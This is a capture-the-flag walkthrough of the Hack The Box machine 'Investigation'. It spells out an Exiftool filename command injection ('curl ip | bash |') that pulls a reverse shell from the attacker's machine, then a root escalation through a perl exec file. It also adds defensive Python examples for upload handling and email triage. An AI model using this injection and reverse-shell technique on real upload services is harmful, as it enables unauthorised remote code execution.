In this post, I would like to share a walkthrough of the Investigation machine from Hack The Box.


This machine is considered an Insane machine on Hack The Box.

What will you gain from the Investigation machine?


For the user flag, you will need to abuse a website that accepts a user-uploaded image and runs Exiftool on it. The version of Exiftool in use is outdated and vulnerable to command injection.


As for the root flag, you need to find logs in the Windows Event Log format and analyze them to obtain a password, which we then use with the malware that runs as root.

Information Gathering on Investigation Machine


Once we have started the VPN connection (the connection pack is downloaded from Hack The Box), we can start information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN


Let’s access the website interface.


However, the website doesn’t have much to explore.


From roaming around just now, we are only aware of a potential username.


However, there’s an upload function in the Free Service section.


Let’s find a jpg file and upload it to the application.


As shown in the screenshot above, we have uploaded the jpg file to the application.

Exiftool vulnerability


I noticed that the Exiftool version in use is vulnerable, and the exploit can be found here.


We can copy the jpg file to a filename containing a command injection that will curl a file from our attacker machine.


Let’s start our Python server.


We can also place the reverse shell into a new file saved in HTML format.


Let’s start our listener with pwncat.


Therefore, let’s upload the file named curl ip | bash |


The request will look something like the above in Burp Suite.


Once the file is successfully uploaded to the application, we get the output shown above.


Looking back at the Python server, it shows that the application retrieved our HTML file.


Boom! We managed to obtain the reverse shell connection back to us.
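The root cause on the application side is worth spelling out. The block below is an added example, not code from the original post or from the machine's web application: it contrasts an upload handler that splices the client-supplied filename into a shell command string (which is why a name like curl ip | bash | becomes extra commands) with a hardened handler that validates the name, stores the file under a server-chosen name and invokes exiftool with an argument list. The function names, the /var/uploads directory and the sample filenames (including the IP address) are assumptions; nothing in the block executes a command, it only builds and inspects command lines.

```python
"""Added example (not code from the original post or the target application):
how an upload handler that splices the client-supplied filename into a shell
command string becomes injectable, and a hardened version. The function
names, the /var/uploads directory and the sample names are assumptions;
nothing here runs a command, it only builds and inspects command lines."""
import os
import re
import secrets
import shlex
from typing import List

ALLOWED_EXT = {".jpg", ".jpeg", ".png"}
# Allow-list for client filenames: alphanumerics, dot, underscore, hyphen.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")

# Constructed sample names. The second mirrors the walkthrough's injection
# shape (curl <ip> | bash |); the address is a placeholder.
BENIGN_NAME = "holiday.jpg"
INJECTED_NAME = "curl 10.10.14.5 | bash |.jpg"


def build_command_unsafe(filename: str) -> str:
    """Weak pattern: the name is interpolated into a string that would be
    handed to `sh -c` (os.system / subprocess with shell=True)."""
    return f"exiftool {filename}"


def count_shell_commands(command: str) -> int:
    """Simplified model of POSIX shell parsing: 1 plus the number of
    unquoted '|' or ';' separators, i.e. how many commands the shell would
    run. Backslash escapes are ignored, which is enough for this demo."""
    count, quote = 1, None
    for ch in command:
        if quote:
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch in "|;":
            count += 1
    return count


def build_command_quoted(filename: str) -> str:
    """Partial fix: shlex.quote keeps the name one shell word, but the
    command still goes through a shell, so prefer build_command_safe."""
    return f"exiftool {shlex.quote(filename)}"


def is_acceptable_upload_name(filename: str) -> bool:
    """Strict allow-list on characters and extension."""
    if not SAFE_NAME.match(filename):
        return False
    return os.path.splitext(filename)[1].lower() in ALLOWED_EXT


def build_command_safe(filename: str, upload_dir: str = "/var/uploads") -> List[str]:
    """Hardened pattern: validate the client name, store the file under a
    server-chosen random name, and build argv as a list for
    subprocess.run(argv) with no shell involved."""
    if not is_acceptable_upload_name(filename):
        raise ValueError("upload name rejected")
    ext = os.path.splitext(filename)[1].lower()
    stored = f"{secrets.token_hex(8)}{ext}"
    return ["exiftool", os.path.join(upload_dir, stored)]


if __name__ == "__main__":
    for name in (BENIGN_NAME, INJECTED_NAME):
        unsafe = build_command_unsafe(name)
        print(f"{name!r}: shell would run {count_shell_commands(unsafe)} command(s)")
        try:
            print("  hardened argv:", build_command_safe(name))
        except ValueError as exc:
            print("  hardened handler:", exc)
```

The quoted variant is shown only to make the point that quoting alone is a patch over the symptom; the durable fix is never letting the client filename reach a shell at all, and not trusting it as the on-disk name either.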


We notice that the only user available on the machine is smorton.


Let’s upload pspy64 to the victim machine to look for any process we can abuse.


We should give the file execute permission and run it.


From the pspy64 output, I noticed a path that looks suspicious: /var/www/html


Let’s access the folder to see what is stored inside.


There’s nothing saved inside the analysed_log file.


The file content is hard to read when you run strings on it.


The msg file is a CDFV2 Microsoft Outlook Message.


Therefore, we should convert the msg file to eml format.


We can read the content of the file by opening it in either Outlook or LibreOffice.


Next, we need to unzip the attachment, and among all that information we managed to find a password.
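Once the msg has been converted to eml, the same steps (read the headers and body, pull out the attachment, look inside the zip) can be done from the command line without opening Outlook or LibreOffice. The block below is an added example and not code from the original post: the message, its addresses and the zip contents are constructed inline so it runs offline, and the zip-slip check on member names is a precaution the post does not mention but that an analyst should run before extracting an attachment from an untrusted mailbox.

```python
"""Added example (not from the original post): parse an .eml with the
standard library, pull out attachments, hash them and list zip members
without extracting anything. The message and its zip are constructed
inline so the script runs offline."""
import hashlib
import io
import posixpath
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from typing import Dict, List, Tuple


def build_sample_eml() -> bytes:
    """Constructed sample message: text body plus one zip attachment.
    Addresses and file names are placeholders, not data from the machine."""
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("logs/Security.evtx.txt", "placeholder exported event records\n")
        zf.writestr("logs/notes.txt", "constructed sample content\n")
    msg = EmailMessage()
    msg["From"] = "analyst@example.com"
    msg["To"] = "user@example.com"
    msg["Subject"] = "Log analysis request (constructed sample)"
    msg.set_content("Attached are the exported logs for review.\n")
    msg.add_attachment(zbuf.getvalue(), maintype="application",
                       subtype="zip", filename="evidence.zip")
    return msg.as_bytes()


def extract_attachments(raw: bytes) -> List[Tuple[str, bytes]]:
    """Return (filename, decoded bytes) for every attachment part."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    return [(part.get_filename() or "unnamed", part.get_payload(decode=True))
            for part in msg.iter_attachments()]


def unsafe_member_names(names: List[str]) -> List[str]:
    """Zip-slip check: members that are absolute or climb out of the
    extraction directory must not be extracted."""
    flagged = []
    for name in names:
        norm = posixpath.normpath(name.replace("\\", "/"))
        if norm.startswith("/") or norm == ".." or norm.startswith("../"):
            flagged.append(name)
    return flagged


def list_zip_members(data: bytes) -> List[Tuple[str, int]]:
    """Member names and uncompressed sizes, read from the central directory
    only; nothing is written to disk."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [(info.filename, info.file_size) for info in zf.infolist()]


def summarize(raw: bytes) -> Dict:
    """Triage view of the message: headers, body and attachment details."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    body = msg.get_body(preferencelist=("plain",))
    report = {
        "from": str(msg["From"]), "to": str(msg["To"]),
        "subject": str(msg["Subject"]),
        "body": body.get_content() if body else "",
        "attachments": [],
    }
    for name, data in extract_attachments(raw):
        entry = {"name": name, "size": len(data),
                 "sha256": hashlib.sha256(data).hexdigest(),
                 "members": [], "unsafe_members": []}
        if zipfile.is_zipfile(io.BytesIO(data)):
            entry["members"] = list_zip_members(data)
            entry["unsafe_members"] = unsafe_member_names(
                [m for m, _ in entry["members"]])
        report["attachments"].append(entry)
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(build_sample_eml()), indent=2))
```

Running the script prints the triage report for the constructed message; pointing summarize() at the bytes of a real converted eml gives the same view of its attachments, and the sha256 values are what you would record in the case notes before going any further.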


We can read the user flag by typing the “cat user.txt” command.

Escalate to Root Privileges Access


As usual, we can look for any SUID binary we can abuse by running the command “sudo -l”.


We can analyze the SUID binary using IDA Pro or Ghidra, but I will just use strings to capture the useful information from the file.


As a result, let’s create a perl file containing exec(“any command”).


Let’s execute the SUID binary with the perl file and the passcode.


We can read the root flag by typing the “cat root.txt” command.

Extra Information